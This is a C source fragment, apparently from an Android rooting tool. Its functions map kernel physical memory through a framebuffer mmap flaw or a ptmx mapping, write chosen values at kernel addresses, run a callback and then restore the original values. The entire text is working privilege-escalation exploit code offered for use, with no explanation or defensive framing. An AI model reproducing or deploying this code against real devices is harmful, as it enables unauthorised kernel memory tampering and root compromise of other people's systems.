static bool
attempt_mmap_fb_mem_exploit(exploit_memory_callback_t callback_func, void *callback_param)
{
unsigned long int offset;
int fd;
void *address;
bool result;
offset = get_kernel_physical_offset();
if (offset) {
fb_mem_set_kernel_phys_offset(offset - 0x00008000);
}
address = fb_mem_mmap(&fd);
if (address == MAP_FAILED) {
return false;
}
result = callback_func(fb_mem_convert_to_mmaped_address((void *)PAGE_OFFSET, address),
KERNEL_SIZE,
callback_param);
fb_mem_munmap(address, fd);
return result;
}
bool
map_kernel_memory(void)
{
if (!kernel_physical_offset) {
if (!setup_variables()) {
return false;
}
}
fb_mmap_fd = -1;
kernel_mapped_address = PTMX_MEMORY_MAPPED_ADDRESS;
if (ptmx_map_memory(PTMX_MEMORY_MAPPED_ADDRESS, kernel_physical_offset, KERNEL_MEMORY_SIZE)) {
return true;
}
fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x8000);
printf("Attempt fb_mem_exploit...\n");
fb_mem_mmap_base = fb_mem_mmap(&fb_mmap_fd);
if (fb_mem_mmap_base) {
kernel_mapped_address = (unsigned long int)fb_mem_convert_to_mmaped_address((void *)KERNEL_BASE_ADDRESS, fb_mem_mmap_base);
return true;
}
fb_mmap_fd = -1;
return false;
}
static bool
attempt_fb_mem_exploit(unsigned long int address,
unsigned long int write_value,
unsigned long int restore_value,
callback_info_t *info)
{
unsigned long int offset;
offset = get_kernel_physical_offset();
if (offset) {
fb_mem_set_kernel_phys_offset(offset - 0x00008000);
}
if (fb_mem_write_value_at_address(address, write_value)) {
run_callback(info);
fb_mem_write_value_at_address(address, restore_value);
return true;
}
return false;
}
